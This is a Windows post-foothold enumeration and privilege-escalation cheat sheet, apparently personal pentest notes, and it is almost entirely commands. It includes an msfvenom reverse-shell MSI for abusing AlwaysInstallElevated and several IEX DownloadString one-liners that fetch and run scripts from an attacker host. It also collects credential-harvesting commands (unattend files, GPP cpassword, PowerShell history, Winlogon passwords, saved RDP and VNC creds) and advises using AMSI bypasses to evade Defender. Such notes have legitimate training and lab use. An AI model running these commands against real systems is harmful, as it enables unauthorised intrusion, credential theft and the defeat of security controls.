Local Enum
Sections Local Enum
First moves after foothold on Windows. Same idea as Linux Local Enum but different commands. AD-joined hosts also need AD MOC enum.
i. The first 60 seconds
whoami
whoami /priv
whoami /groups
whoami /all
hostname
[System.Environment]::OSVersion.Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain"
$env:USERDOMAIN
$env:LOGONSERVER
What to look at:
whoami /priv-> anyEnabledprivilege that maps to GodPotato / SeBackup etc, see PrivEsc - Tokens & Privilegeswhoami /groups-> Administrators, Backup Operators, DnsAdmins, Hyper-V Admins all = high-valuesysteminfoDomain field -> joined to AD, see AD MOC
ii. Users and groups
net user
net user Administrator
net localgroup
net localgroup Administrators
net accounts ## password policy
PowerShell:
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Logged-in users right now:
query user
qwinsta
quser
iii. Processes and network state
tasklist /v /fo list
tasklist /svc
netstat -anob
PowerShell:
Get-Process | Select-Object Id,ProcessName,@{N='User';E={(Get-Process -Id $_.Id -IncludeUserName).UserName}}
Get-NetTCPConnection -State Listen | Select-Object LocalAddress,LocalPort,OwningProcess
Look for:
- Processes running as
NT AUTHORITY\SYSTEMyou can interact with - Listening ports on 127.0.0.1 (internal services)
- Tasks containing creds in command line (
tasklist /vshows full cmdline)
iv. Network and routing
ipconfig /all
route print
arp -a
PowerShell:
Get-NetIPConfiguration
Get-NetIPAddress
Get-DnsClientServerAddress
Get-NetRoute
Look for extra interfaces (Hyper-V switches, VPN tunnels, second NIC -> separate networks for Pivoting ).
v. Privileges and tokens
This is the most important single check on Windows. Full table in PrivEsc - Tokens & Privileges .
whoami /priv
Privileges that mean privesc:
SeImpersonatePrivilege-> Potato attackSeAssignPrimaryTokenPrivilege-> Potato attackSeBackupPrivilege-> dump SAM/SYSTEMSeRestorePrivilege-> write any fileSeDebugPrivilege-> dump LSASSSeLoadDriverPrivilege-> driver tricksSeTakeOwnershipPrivilege-> own any fileSeManageVolumePrivilege-> volume control = file accessSeTcbPrivilege-> “act as part of OS”, basically SYSTEM
vi. AlwaysInstallElevated
A misconfig that runs MSI installers as SYSTEM. Check both hives:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Both must be 1 for it to work. If yes:
## On attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f msi -o sh.msi
## On target
msiexec /quiet /qn /i C:\Windows\Temp\sh.msi
vii. Service enum
Service-based privesc surface in PrivEsc - Services & Registry . First-pass enum:
Get-Service | Where-Object {$_.Status -eq 'Running'}
Get-CimInstance -ClassName Win32_Service | Select-Object Name,StartMode,State,StartName,PathName
Service binary writable check (privesc indicator):
Get-CimInstance Win32_Service | ForEach-Object {
$p = ($_.PathName -replace '"','' -split ' ')[0]
if ($p -and (Test-Path $p)) {
$a = Get-Acl $p
if ($a.Access | Where-Object {$_.IdentityReference -match $env:USERNAME -and $_.FileSystemRights -match 'Write|FullControl'}) {
"WRITABLE: $($_.Name) -> $p"
}
}
}
Unquoted service paths:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
viii. Scheduled tasks
schtasks /query /fo LIST /v
PowerShell:
Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'} | Select-Object TaskName,TaskPath,Author
## Tasks running as elevated user that you can modify:
Get-ScheduledTask | ForEach-Object {
$p = $_.Principal.UserId
if ($p -match 'SYSTEM|Administrator') {
$_.Actions | ForEach-Object {
$exe = $_.Execute -replace '"',''
if ($exe -and (Test-Path $exe) -and ((Get-Acl $exe).Access | Where-Object {$_.FileSystemRights -match 'Write'})) {
"WRITABLE TASK: $($_.TaskName) -> $exe"
}
}
}
}
ix. Installed software and patch level
wmic product get name,version
wmic qfe list brief
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"KB"
PowerShell:
Get-CimInstance -ClassName Win32_QuickFixEngineering | Select-Object HotFixID,InstalledOn
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName,DisplayVersion
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName,DisplayVersion
Feed systeminfo output to Windows-Exploit-Suggester for kernel exploit candidates, see PrivEsc - Kernel & Exploits
.
x. Files of interest
Files that often have creds:
dir /s /b C:\Users\*unattend.xml 2>nul
dir /s /b C:\unattend.xml 2>nul
dir /s /b C:\Windows\Panther\Unattend.xml 2>nul
dir /s /b C:\Windows\Panther\Unattend\Unattend.xml 2>nul
dir /s /b C:\Windows\System32\sysprep\sysprep.xml 2>nul
dir /s /b C:\sysprep.inf 2>nul
GPP cpassword (XML in SYSVOL when on a DC, sometimes cached locally):
findstr /S /I "cpassword" \\domain\sysvol\domain\Policies\*.xml
Saved RDP creds:
cmdkey /list
If cmdkey /list shows targets, use runas /savecred:
runas /savecred /user:DOMAIN\Administrator "cmd.exe"
Browser saved creds, SSH config, MobaXterm files:
Get-ChildItem -Recurse -Force C:\Users\ -ErrorAction SilentlyContinue -Include 'Login Data','wallet*','*.ovpn','*.rdp','sshconfig*','.ssh' 2>$null
xi. PowerShell history
PSReadLine logs every command to a file by default. Read other users’ history if you have rights:
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object {Write-Host $_.FullName; Get-Content $_.FullName}
This catches inline passwords typed in PowerShell sessions. The single best Windows credential source after LSASS.
xii. Registry hives worth reading
## Saved auto-logon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
## Putty saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
## SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
## Saved VNC password
reg query "HKCU\Software\ORL\WinVNC3\Password"
xiii. Run winPEAS
The Windows equivalent of linpeas, much more verbose. Drop and run:
## Pipe execution, no disk write:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/winPEAS.ps1')
## or save and run:
iwr http://10.10.14.1/winPEASx64.exe -o C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
Read by color the same way as linpeas: red-yellow first.
xiv. PowerUp / Sherlock / PrivescCheck
PowerUp is the classic, PrivescCheck is the modern replacement:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/PrivescCheck.ps1'); Invoke-PrivescCheck
## PowerUp (older but still useful):
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerUp.ps1'); Invoke-AllChecks
Most ps1 tools are signatured. Either run them through an AMSI bypass first or use a fresh fork (search “amsi bypass 2024” on GitHub for working versions). See Defender & AMSI Evasion when those files exist.
xv. Triage checklist
Before opening any privesc file:
-
whoami /privoutput reviewed -
whoami /groupsfor privileged group memberships - Service enum (writable binaries, unquoted paths)
- Scheduled tasks as SYSTEM that you can modify
- AlwaysInstallElevated check
- systeminfo + missing patches
- PowerShell history of all users (where readable)
- Files of interest (Unattend.xml, GPP, saved creds)
- cmdkey /list
- winPEAS red-yellow output
Then work PrivEsc - Tokens & Privileges -> PrivEsc - Services & Registry -> PrivEsc - DLL & Unquoted Paths -> PrivEsc - Credentials & Files . Kernel exploits last.